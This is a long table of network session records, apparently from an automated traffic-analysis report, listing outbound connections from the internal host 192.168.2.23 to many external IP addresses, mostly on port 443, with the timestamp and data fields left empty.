                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19746192.168.2.2336236132.75.89.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19747192.168.2.235969690.190.88.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19748192.168.2.2355580164.39.63.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19749192.168.2.235793098.13.88.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19750192.168.2.235939666.86.61.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19751192.168.2.2355310136.63.55.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19752192.168.2.2335850161.252.248.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19753192.168.2.2357286178.247.152.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19754192.168.2.2345754110.201.204.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19755192.168.2.23338745.52.205.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19756192.168.2.2337472166.26.214.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19757192.168.2.2352658121.11.33.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19758192.168.2.2350756130.110.210.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19759192.168.2.235692245.242.144.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19760192.168.2.2337416186.183.100.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19761192.168.2.2358858121.106.143.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19762192.168.2.2350042216.140.29.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19763192.168.2.235797695.127.253.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19764192.168.2.2341268192.98.190.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19765192.168.2.235653447.154.229.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19766192.168.2.2346222102.183.217.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19767192.168.2.2334728102.168.207.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19768192.168.2.233719688.173.8.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19769192.168.2.2344888150.97.175.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19770192.168.2.2356510182.147.133.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19771192.168.2.2358280177.30.215.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19772192.168.2.2338736115.36.192.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19773192.168.2.235481260.80.121.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19774192.168.2.234472444.188.155.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19775192.168.2.2355490156.140.33.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19776192.168.2.2340044105.154.110.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19777192.168.2.2359962120.116.1.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19778192.168.2.233824431.136.157.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19779192.168.2.2336272175.192.60.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19780192.168.2.2358876109.216.127.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19781192.168.2.234905283.254.153.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19782192.168.2.2353666157.98.211.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19783192.168.2.235898064.140.92.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19784192.168.2.235194623.25.89.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19785192.168.2.233460075.17.227.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19786192.168.2.2359472185.41.34.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19787192.168.2.2356840202.231.92.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19788192.168.2.2334296210.50.148.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19789192.168.2.2353694122.252.65.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19790192.168.2.235964242.183.230.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19791192.168.2.2345504218.199.217.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19792192.168.2.2344658187.222.86.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19793192.168.2.2340254159.101.228.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19794192.168.2.235994444.2.84.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19795192.168.2.235872668.168.223.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19796192.168.2.233788469.199.1.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19797192.168.2.233667835.202.110.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19798192.168.2.2348102185.123.232.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19799192.168.2.2333170157.233.252.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19800192.168.2.2352406143.148.122.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19801192.168.2.2353884166.215.218.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19802192.168.2.2337464191.226.121.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19803192.168.2.2351150185.66.214.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19804192.168.2.2352656109.232.203.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19805192.168.2.234698248.20.50.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19806192.168.2.2349810121.83.134.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19807192.168.2.2336180128.143.99.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19808192.168.2.2343918153.238.177.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19809192.168.2.2360364142.194.215.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19810192.168.2.2358408112.130.210.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19811192.168.2.2339090124.191.102.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19812192.168.2.2351410216.159.232.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19813192.168.2.2351708136.251.15.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19814192.168.2.235160679.59.26.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19815192.168.2.2340142143.14.45.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19816192.168.2.2336510217.17.154.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19817192.168.2.2333820176.13.79.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19818192.168.2.2335208152.86.126.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19819192.168.2.2339312204.208.68.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19820192.168.2.23502948.98.52.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19821192.168.2.234868083.159.173.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19822192.168.2.2351884130.20.68.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19823192.168.2.234900283.77.40.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19824192.168.2.2339782176.100.207.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19825192.168.2.235143694.110.103.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19826192.168.2.2342578154.208.173.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19827192.168.2.23504869.14.172.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19828192.168.2.234903676.16.146.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19829192.168.2.234491225.0.33.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19830192.168.2.235780437.168.41.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19831192.168.2.2349192139.189.206.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19832192.168.2.2335040132.121.228.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19833192.168.2.2357752203.244.151.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19834192.168.2.2351882135.216.39.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19835192.168.2.233369694.240.152.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19836192.168.2.2352000175.50.102.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19837192.168.2.23603181.221.100.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19838192.168.2.235816659.240.243.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19839192.168.2.2335810172.217.99.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19840192.168.2.235373624.197.133.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19841192.168.2.233629654.141.1.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19842192.168.2.2335906142.132.184.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19843192.168.2.2338322193.56.22.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19844192.168.2.2335946152.95.33.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19845192.168.2.23393404.231.255.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19846192.168.2.2335752109.164.196.338080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19847192.168.2.234005495.86.73.68080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19848192.168.2.235148294.126.129.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19849192.168.2.2340578190.144.203.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19850192.168.2.2350816105.137.147.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19851192.168.2.2338612200.159.58.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19852192.168.2.235864627.177.222.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19853192.168.2.233752613.83.152.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19854192.168.2.2351958160.31.164.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19855192.168.2.2348216160.138.194.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19856192.168.2.23468321.58.43.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19857192.168.2.2360044221.136.191.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19858192.168.2.2352696104.112.137.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19859192.168.2.2348306110.225.109.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19860192.168.2.2359700126.55.206.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19861192.168.2.2342098143.24.70.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19862192.168.2.2354780178.88.190.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19863192.168.2.2335114140.173.215.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19864192.168.2.234582875.163.46.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19865192.168.2.2333702205.163.188.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19866192.168.2.2334628174.140.118.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19867192.168.2.2352314179.133.9.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19868192.168.2.2358750107.232.218.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19869192.168.2.234262069.26.171.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19870192.168.2.235116688.135.168.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19871192.168.2.2347572213.80.39.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19872192.168.2.2358376203.118.155.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19873192.168.2.2358194177.140.63.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19874192.168.2.2349432110.144.176.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19875192.168.2.233938072.118.133.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19876192.168.2.235643494.126.31.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19877192.168.2.2355992206.61.223.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19878192.168.2.2335070173.166.146.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19879192.168.2.2345772203.231.242.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19880192.168.2.2333904104.82.192.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19881192.168.2.2336878207.102.62.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19882192.168.2.2347256171.146.169.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19883192.168.2.2342716117.172.209.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19884192.168.2.2339404141.145.23.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19885192.168.2.2344418115.151.76.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19886192.168.2.2348800136.252.164.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19887192.168.2.2335694175.229.92.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19888192.168.2.2343638130.160.0.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19889192.168.2.2358114111.211.186.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19890192.168.2.233697812.116.197.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19891192.168.2.2360628208.45.27.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19892192.168.2.233573849.111.203.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19893192.168.2.2348382134.12.98.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19894192.168.2.2346164189.10.237.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19895192.168.2.234922494.145.7.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19896192.168.2.234805413.162.176.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19897192.168.2.234076460.176.97.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19898192.168.2.2352610217.162.19.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19899192.168.2.2359152169.159.71.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19900192.168.2.233384035.59.127.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19901192.168.2.235306060.87.213.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19902192.168.2.2337986177.160.217.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19903192.168.2.2341408209.192.72.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19904192.168.2.235237275.10.70.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19905192.168.2.2336598142.93.135.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19906192.168.2.2340456156.176.27.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19907192.168.2.235835614.226.234.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19908192.168.2.2345582138.207.19.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19909192.168.2.235994840.47.169.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19910192.168.2.2341430189.67.160.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19911192.168.2.233321647.37.30.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19912192.168.2.236039478.171.136.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19913192.168.2.233434613.43.28.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19914192.168.2.2352282143.236.104.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19915192.168.2.2339988109.59.230.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19916192.168.2.2334280178.239.201.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19917192.168.2.2355514164.102.145.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19918192.168.2.23418488.163.202.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19919192.168.2.233929881.70.141.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19920192.168.2.2357934103.112.87.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19921192.168.2.234852887.195.144.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19922192.168.2.2343822118.111.243.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19923192.168.2.2338310187.153.198.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19924192.168.2.2350514102.130.134.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19925192.168.2.2335590164.226.85.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19926192.168.2.234958488.84.129.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19927192.168.2.233807882.243.214.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19928192.168.2.2333600130.73.49.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19929192.168.2.235553296.125.106.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19930192.168.2.235769243.253.74.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19931192.168.2.2355690169.133.136.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19932192.168.2.2355384136.21.126.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19933192.168.2.2343858158.238.34.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19934192.168.2.235568625.168.126.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19935192.168.2.233619824.223.114.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19936192.168.2.2352256196.89.46.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19937192.168.2.2340834123.20.32.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19938192.168.2.2338294222.154.145.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19939192.168.2.2338260188.71.102.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19940192.168.2.2354868222.227.135.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19941192.168.2.2343870209.10.224.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19942192.168.2.2353034195.247.234.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19943192.168.2.234603042.185.48.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19944192.168.2.235019636.151.99.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19945192.168.2.2334296109.188.233.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19946192.168.2.2350454193.99.3.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19947192.168.2.235066497.6.155.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19948192.168.2.234580642.62.236.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19949192.168.2.234639290.242.176.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19950192.168.2.235947841.6.178.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19951192.168.2.2350706125.36.203.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19952192.168.2.234920460.131.153.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19953192.168.2.2347082121.57.24.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19954192.168.2.2334362101.94.57.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19955192.168.2.2339684141.157.154.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19956192.168.2.2356396197.209.45.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19957192.168.2.2341122186.194.205.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19958192.168.2.2359192135.43.93.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19959192.168.2.2358406117.92.103.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19960192.168.2.235656239.206.39.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19961192.168.2.2352880138.165.170.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19962192.168.2.2336616155.3.169.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19963192.168.2.235373248.78.161.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19964192.168.2.2346230194.90.244.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19965192.168.2.2351164211.122.37.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19966192.168.2.235150890.128.236.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19967192.168.2.2332936212.178.192.101443
